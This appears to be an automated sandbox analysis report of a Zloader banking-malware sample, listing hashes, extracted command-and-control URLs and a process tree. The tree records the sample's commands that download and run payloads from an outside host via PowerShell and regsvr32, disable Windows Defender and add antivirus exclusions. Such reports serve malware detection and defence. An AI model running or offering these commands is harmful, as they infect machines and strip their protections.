Analysis

  • max time kernel
    59s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    12-08-2021 13:49

General

  • Target

    42a3e6ae86fe540cfc106f4edc55eccc.exe

  • Size

    165KB

  • MD5

    42a3e6ae86fe540cfc106f4edc55eccc

  • SHA1

    5a43baf8b4e0150ad0228a13da2000311f36f823

  • SHA256

    7ba99f8f77a2e660f1837cad9d169ccf892154da5b2651e4e6e66efddd61944c

  • SHA512

    25d05657f8f927c438ff5240f9f29e8c695e13e8664e822f729c01055026b2ef66ccbebadc0931d5ba488ff369c6dbd1c09055b99ea0f374a37ff6c3bca665c4

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

C2

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain
rsa_pubkey.plain

Signatures

  • Zloader, Terdot, DELoader, ZeusSphinx

    Zloader is a malware strain that was initially discovered back in August 2015.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\42a3e6ae86fe540cfc106f4edc55eccc.exe
    "C:\Users\Admin\AppData\Local\Temp\42a3e6ae86fe540cfc106f4edc55eccc.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1628
    • C:\Windows\system32\cmd.exe
      cmd /c start.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2016
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Invoke-WebRequest https://pornotublovers.com/JavaE.dll -OutFile JavaE.dll
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1428
      • C:\Windows\system32\regsvr32.exe
        regsvr32 JavaE.dll
        3⤵
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of WriteProcessMemory
        PID:1620
        • C:\Windows\SysWOW64\regsvr32.exe
          JavaE.dll
          4⤵
          • Loads dropped DLL
          PID:1768
          • C:\Windows\SysWOW64\msiexec.exe
            msiexec.exe
            5⤵
              PID:820
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat
          3⤵
            PID:1804
          • C:\Windows\system32\cmd.exe
            cmd /c nsudo.bat
            3⤵
              PID:1612
              • C:\Windows\system32\cacls.exe
                "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                4⤵
                  PID:1692
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe
                  4⤵
                    PID:852
                  • C:\Users\Admin\AppData\Roaming\javase.exe
                    javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
                    4⤵
                      PID:1556
                    • C:\Users\Admin\AppData\Roaming\javase.exe
                      javase -U:T sc config WinDefend start= disabled
                      4⤵
                        PID:1064
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"C:\Users\Admin\AppData\Roaming'"
                        4⤵
                          PID:1664
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""
                          4⤵
                            PID:1792
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""
                            4⤵
                              PID:1128
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""
                              4⤵
                                PID:1812
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""
                                4⤵
                                  PID:1536

                          Network

                          MITRE ATT&CK Matrix ATT&CK v6

                          Persistence

                          Registry Run Keys / Startup Folder

                          1
                          T1060

                          Defense Evasion

                          Modify Registry

                          1
                          T1112

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0128c30e-1df7-4d00-b4d4-4d6c68e9277a
                            MD5

                            d89968acfbd0cd60b51df04860d99896

                            SHA1

                            b3c29916ccb81ce98f95bbf3aa8a73de16298b29

                            SHA256

                            1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

                            SHA512

                            b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1b9537f7-9547-4d4a-9cfd-4891d404937c
                            MD5

                            2d5cd190b5db0620cd62e3cd6ba1dcd3

                            SHA1

                            ff4f229f4fbacccdf11d98c04ba756bda80aac7a

                            SHA256

                            ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

                            SHA512

                            edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_38869689-0267-4604-b217-6cddcf0e3f23
                            MD5

                            a70ee38af4bb2b5ed3eeb7cbd1a12fa3

                            SHA1

                            81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

                            SHA256

                            dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

                            SHA512

                            8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7abe1438-6d58-4a63-b0b8-be55c820160c
                            MD5

                            e5b3ba61c3cf07deda462c9b27eb4166

                            SHA1

                            b324dad73048be6e27467315f82b7a5c1438a1f9

                            SHA256

                            b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

                            SHA512

                            a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c656a546-863c-429c-9799-620a9393df92
                            MD5

                            6f0d509e28be1af95ba237d4f43adab4

                            SHA1

                            c665febe79e435843553bee86a6cea731ce6c5e4

                            SHA256

                            f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

                            SHA512

                            8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d9c7db65-fcf8-4a65-a58f-52dda9a7c4b9
                            MD5

                            faa37917b36371249ac9fcf93317bf97

                            SHA1

                            a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

                            SHA256

                            b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

                            SHA512

                            614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ee3c22c8-6e82-4d86-b172-1a9fd638dadf
                            MD5

                            7f79b990cb5ed648f9e583fe35527aa7

                            SHA1

                            71b177b48c8bd745ef02c2affad79ca222da7c33

                            SHA256

                            080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

                            SHA512

                            20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                            MD5

                            01c94b8c04aded57b718749333422850

                            SHA1

                            1eed85e8933a880a33e782199fbdc6cdac43f2d4

                            SHA256

                            dc5b60ec69e847d0fe722c8131584f012243f2307792c3dea06f0b13da7cd0f6

                            SHA512

                            b2fa87aa8a415cb5c568c1178a521d04d8dcbce0d0e87735b241b2c7942df7dc9d040c50e87b0f4e32de9b5d8b463466869965068c3aa59530fb54a5ab9bc872

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                            MD5

                            bd35c2d785b642ad97f1e9a2a8c8a787

                            SHA1

                            594e6ba283e0021a3ff10bd2ae2a1e5ef179b6ae

                            SHA256

                            f3ddcf185c312ea5ef8e8d67377e83cd186f9650bc28a46f28a6b14e6c3d771d

                            SHA512

                            56d596c0334a6d4cfb1c358a4b6c23c4d505beffd9dc08150ddf780dd9c30cad773248cf390488b3a4b014272fb77a8929322ef3e8b1708710ece029734b33e7

                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
                            MD5

                            01d416e7915dfd9a2ca0301a02953a3b

                            SHA1

                            b53467be2ca6f37a1b871f9e8f1b1e60af24d72d

                            SHA256

                            1f2c81f0733961b7d585e68d31152ee2c32bbbadb081168ef6ecbb02b28bf061

                            SHA512

                            4f939988b52f4f2c4c2d9f55d2e3aa3cdf3e024fd2d97048982f0db4918f4198d1192f964a3000c063ceaa31b6fa85c72c150108ca63b66f6b29d046127428c6

                          • C:\Users\Admin\AppData\Roaming\JavaE.dll
                            MD5

                            a9dd9b9eff47af724436e2abdcd5ce6c

                            SHA1

                            1a9c9258f0345f5edddd933a7bd15ec42be51f8e

                            SHA256

                            cdaca5b6aabd92a7b782c2d7b250cbc1b2ed4c5a78091271f788d58dedcd94f6

                            SHA512

                            28af95d398c6311bd593489019be39a23218d64d5236f765c4ecadf43bff07f0ab2aea10413ad7390e3805b09921cdd6c33db734023a6b91a1735125793aea52

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                            MD5

                            5464e76852566ef4c28c361273bfbe5b

                            SHA1

                            17eb8225c48c298ac0f6a0450cc7399548e2529c

                            SHA256

                            4f9e754e0f4387199c3652564ed0f88498bdfc33334fbd0e2eee231138c85cbd

                            SHA512

                            83fad50d726e734ae7da8bfb690f455cd04e4634c829f54350495319b31ef6f96c14f70cc345f1fc0dfbad0ca44eedbad6edd7000b336734ef25113fbe334cca

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                            MD5

                            5464e76852566ef4c28c361273bfbe5b

                            SHA1

                            17eb8225c48c298ac0f6a0450cc7399548e2529c

                            SHA256

                            4f9e754e0f4387199c3652564ed0f88498bdfc33334fbd0e2eee231138c85cbd

                            SHA512

                            83fad50d726e734ae7da8bfb690f455cd04e4634c829f54350495319b31ef6f96c14f70cc345f1fc0dfbad0ca44eedbad6edd7000b336734ef25113fbe334cca

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                            MD5

                            5464e76852566ef4c28c361273bfbe5b

                            SHA1

                            17eb8225c48c298ac0f6a0450cc7399548e2529c

                            SHA256

                            4f9e754e0f4387199c3652564ed0f88498bdfc33334fbd0e2eee231138c85cbd

                            SHA512

                            83fad50d726e734ae7da8bfb690f455cd04e4634c829f54350495319b31ef6f96c14f70cc345f1fc0dfbad0ca44eedbad6edd7000b336734ef25113fbe334cca

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                            MD5

                            5464e76852566ef4c28c361273bfbe5b

                            SHA1

                            17eb8225c48c298ac0f6a0450cc7399548e2529c

                            SHA256

                            4f9e754e0f4387199c3652564ed0f88498bdfc33334fbd0e2eee231138c85cbd

                            SHA512

                            83fad50d726e734ae7da8bfb690f455cd04e4634c829f54350495319b31ef6f96c14f70cc345f1fc0dfbad0ca44eedbad6edd7000b336734ef25113fbe334cca

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                            MD5

                            5464e76852566ef4c28c361273bfbe5b

                            SHA1

                            17eb8225c48c298ac0f6a0450cc7399548e2529c

                            SHA256

                            4f9e754e0f4387199c3652564ed0f88498bdfc33334fbd0e2eee231138c85cbd

                            SHA512

                            83fad50d726e734ae7da8bfb690f455cd04e4634c829f54350495319b31ef6f96c14f70cc345f1fc0dfbad0ca44eedbad6edd7000b336734ef25113fbe334cca

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                            MD5

                            5464e76852566ef4c28c361273bfbe5b

                            SHA1

                            17eb8225c48c298ac0f6a0450cc7399548e2529c

                            SHA256

                            4f9e754e0f4387199c3652564ed0f88498bdfc33334fbd0e2eee231138c85cbd

                            SHA512

                            83fad50d726e734ae7da8bfb690f455cd04e4634c829f54350495319b31ef6f96c14f70cc345f1fc0dfbad0ca44eedbad6edd7000b336734ef25113fbe334cca

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                            MD5

                            5464e76852566ef4c28c361273bfbe5b

                            SHA1

                            17eb8225c48c298ac0f6a0450cc7399548e2529c

                            SHA256

                            4f9e754e0f4387199c3652564ed0f88498bdfc33334fbd0e2eee231138c85cbd

                            SHA512

                            83fad50d726e734ae7da8bfb690f455cd04e4634c829f54350495319b31ef6f96c14f70cc345f1fc0dfbad0ca44eedbad6edd7000b336734ef25113fbe334cca

                          • C:\Users\Admin\AppData\Roaming\javase.exe
                            MD5

                            5cae01aea8ed390ce9bec17b6c1237e4

                            SHA1

                            3a80a49efaac5d839400e4fb8f803243fb39a513

                            SHA256

                            19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                            SHA512

                            c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                          • C:\Users\Admin\AppData\Roaming\javase.exe
                            MD5

                            5cae01aea8ed390ce9bec17b6c1237e4

                            SHA1

                            3a80a49efaac5d839400e4fb8f803243fb39a513

                            SHA256

                            19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                            SHA512

                            c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                          • C:\Users\Admin\AppData\Roaming\nsudo.bat
                            MD5

                            995c3f852ca1e81fc395a5c46b06cb9e

                            SHA1

                            0bc6bc2e425eef07669fa877573b9ba5513ae833

                            SHA256

                            81c64df94f955a49ea7b12ed58098b3dd43c02a28c2f3484c9d4aec0929ddfeb

                            SHA512

                            62dd4f3051917942ee5cae765f4fa0f4da96c49eafd4f00a978f84ddf139488e78a896ff3bdd307dc7d0bfe1902525aa446d7878f016c5ce895bdaee524eebaf

                          • \??\PIPE\srvsvc
                            MD5

                            d41d8cd98f00b204e9800998ecf8427e

                            SHA1

                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                            SHA256

                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                            SHA512

                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                          • \Users\Admin\AppData\Roaming\JavaE.dll
                            MD5

                            a9dd9b9eff47af724436e2abdcd5ce6c

                            SHA1

                            1a9c9258f0345f5edddd933a7bd15ec42be51f8e

                            SHA256

                            cdaca5b6aabd92a7b782c2d7b250cbc1b2ed4c5a78091271f788d58dedcd94f6

                            SHA512

                            28af95d398c6311bd593489019be39a23218d64d5236f765c4ecadf43bff07f0ab2aea10413ad7390e3805b09921cdd6c33db734023a6b91a1735125793aea52

                          • \Users\Admin\AppData\Roaming\javase.exe
                            MD5

                            5cae01aea8ed390ce9bec17b6c1237e4

                            SHA1

                            3a80a49efaac5d839400e4fb8f803243fb39a513

                            SHA256

                            19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                            SHA512

                            c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                          • \Users\Admin\AppData\Roaming\javase.exe
                            MD5

                            5cae01aea8ed390ce9bec17b6c1237e4

                            SHA1

                            3a80a49efaac5d839400e4fb8f803243fb39a513

                            SHA256

                            19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                            SHA512

                            c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                          • memory/820-80-0x0000000000000000-mapping.dmp
                          • memory/820-89-0x00000000000E0000-0x0000000000106000-memory.dmp
                            Filesize

                            152KB

                          • memory/852-104-0x0000000002880000-0x0000000002881000-memory.dmp
                            Filesize

                            4KB

                          • memory/852-100-0x0000000002360000-0x0000000002361000-memory.dmp
                            Filesize

                            4KB

                          • memory/852-106-0x000000001C0C0000-0x000000001C0C1000-memory.dmp
                            Filesize

                            4KB

                          • memory/852-105-0x0000000002420000-0x0000000002421000-memory.dmp
                            Filesize

                            4KB

                          • memory/852-103-0x000000001A984000-0x000000001A986000-memory.dmp
                            Filesize

                            8KB

                          • memory/852-102-0x000000001A980000-0x000000001A982000-memory.dmp
                            Filesize

                            8KB

                          • memory/852-97-0x0000000000000000-mapping.dmp
                          • memory/852-101-0x000000001AB00000-0x000000001AB01000-memory.dmp
                            Filesize

                            4KB

                          • memory/1064-112-0x0000000000000000-mapping.dmp
                          • memory/1128-158-0x0000000000000000-mapping.dmp
                          • memory/1128-164-0x0000000002520000-0x0000000002522000-memory.dmp
                            Filesize

                            8KB

                          • memory/1128-165-0x0000000002524000-0x0000000002526000-memory.dmp
                            Filesize

                            8KB

                          • memory/1428-67-0x000000001ABC0000-0x000000001ABC2000-memory.dmp
                            Filesize

                            8KB

                          • memory/1428-68-0x000000001ABC4000-0x000000001ABC6000-memory.dmp
                            Filesize

                            8KB

                          • memory/1428-63-0x0000000000000000-mapping.dmp
                          • memory/1428-71-0x000000001C410000-0x000000001C411000-memory.dmp
                            Filesize

                            4KB

                          • memory/1428-65-0x00000000022D0000-0x00000000022D1000-memory.dmp
                            Filesize

                            4KB

                          • memory/1428-70-0x00000000026F0000-0x00000000026F1000-memory.dmp
                            Filesize

                            4KB

                          • memory/1428-69-0x00000000023B0000-0x00000000023B1000-memory.dmp
                            Filesize

                            4KB

                          • memory/1428-66-0x000000001AC40000-0x000000001AC41000-memory.dmp
                            Filesize

                            4KB

                          • memory/1536-182-0x000000001AC20000-0x000000001AC22000-memory.dmp
                            Filesize

                            8KB

                          • memory/1536-177-0x0000000000000000-mapping.dmp
                          • memory/1536-183-0x000000001AC24000-0x000000001AC26000-memory.dmp
                            Filesize

                            8KB

                          • memory/1556-108-0x0000000000000000-mapping.dmp
                          • memory/1612-94-0x0000000000000000-mapping.dmp
                          • memory/1620-72-0x0000000000000000-mapping.dmp
                          • memory/1628-60-0x000007FEFC031000-0x000007FEFC033000-memory.dmp
                            Filesize

                            8KB

                          • memory/1664-118-0x00000000020A0000-0x00000000020A1000-memory.dmp
                            Filesize

                            4KB

                          • memory/1664-123-0x0000000002170000-0x0000000002171000-memory.dmp
                            Filesize

                            4KB

                          • memory/1664-124-0x00000000025C0000-0x00000000025C1000-memory.dmp
                            Filesize

                            4KB

                          • memory/1664-127-0x0000000002710000-0x0000000002711000-memory.dmp
                            Filesize

                            4KB

                          • memory/1664-139-0x0000000002600000-0x0000000002601000-memory.dmp
                            Filesize

                            4KB

                          • memory/1664-140-0x0000000002610000-0x0000000002611000-memory.dmp
                            Filesize

                            4KB

                          • memory/1664-122-0x000000001AD64000-0x000000001AD66000-memory.dmp
                            Filesize

                            8KB

                          • memory/1664-121-0x000000001AD60000-0x000000001AD62000-memory.dmp
                            Filesize

                            8KB

                          • memory/1664-120-0x00000000024E0000-0x00000000024E1000-memory.dmp
                            Filesize

                            4KB

                          • memory/1664-119-0x000000001ADE0000-0x000000001ADE1000-memory.dmp
                            Filesize

                            4KB

                          • memory/1664-115-0x0000000000000000-mapping.dmp
                          • memory/1692-96-0x0000000000000000-mapping.dmp
                          • memory/1768-79-0x0000000010000000-0x0000000010129000-memory.dmp
                            Filesize

                            1.2MB

                          • memory/1768-78-0x0000000000280000-0x0000000000281000-memory.dmp
                            Filesize

                            4KB

                          • memory/1768-76-0x0000000075551000-0x0000000075553000-memory.dmp
                            Filesize

                            8KB

                          • memory/1768-75-0x0000000000000000-mapping.dmp
                          • memory/1792-146-0x000000001A980000-0x000000001A982000-memory.dmp
                            Filesize

                            8KB

                          • memory/1792-147-0x000000001A984000-0x000000001A986000-memory.dmp
                            Filesize

                            8KB

                          • memory/1792-141-0x0000000000000000-mapping.dmp
                          • memory/1804-88-0x000000001AB94000-0x000000001AB96000-memory.dmp
                            Filesize

                            8KB

                          • memory/1804-91-0x0000000002460000-0x0000000002461000-memory.dmp
                            Filesize

                            4KB

                          • memory/1804-90-0x00000000023B0000-0x00000000023B1000-memory.dmp
                            Filesize

                            4KB

                          • memory/1804-93-0x000000001B7C0000-0x000000001B7C1000-memory.dmp
                            Filesize

                            4KB

                          • memory/1804-87-0x000000001AB90000-0x000000001AB92000-memory.dmp
                            Filesize

                            8KB

                          • memory/1804-86-0x000000001AC10000-0x000000001AC11000-memory.dmp
                            Filesize

                            4KB

                          • memory/1804-85-0x0000000002260000-0x0000000002261000-memory.dmp
                            Filesize

                            4KB

                          • memory/1804-81-0x0000000000000000-mapping.dmp
                          • memory/1812-167-0x0000000000000000-mapping.dmp
                          • memory/1812-174-0x000000001AA60000-0x000000001AA62000-memory.dmp
                            Filesize

                            8KB

                          • memory/1812-175-0x000000001AA64000-0x000000001AA66000-memory.dmp
                            Filesize

                            8KB

                          • memory/2016-61-0x0000000000000000-mapping.dmp